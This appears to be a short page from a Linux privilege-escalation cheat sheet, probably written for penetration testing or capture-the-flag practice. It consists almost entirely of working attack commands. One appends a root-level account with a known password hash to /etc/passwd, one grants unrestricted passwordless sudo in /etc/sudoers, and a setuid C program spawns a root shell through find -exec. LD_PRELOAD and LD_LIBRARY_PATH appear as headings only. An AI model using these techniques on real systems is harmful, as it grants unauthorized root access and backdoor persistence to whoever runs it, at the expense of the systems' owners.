linux-privilege-escalation
Password hijacking
# for /etc/passwd
openssl passwd <PASSWORD>
# kashz:kashz
echo 'kashz:cAZZtf3ncxRAY:0:0:root:/root:/bin/bash' >> /etc/passwd
# for /etc/shadow
python3 -c 'import crypt, getpass; print(crypt.crypt(getpass.getpass()))'
# for /etc/sudoers; sudo su
echo 'USER ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoerssetuid.c
// cat setuid.c
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
// find . -exec './setuid' \;.so shell
LD_PRELOAD
LD_LIBRARY_PATH
Last updated
Was this helpful?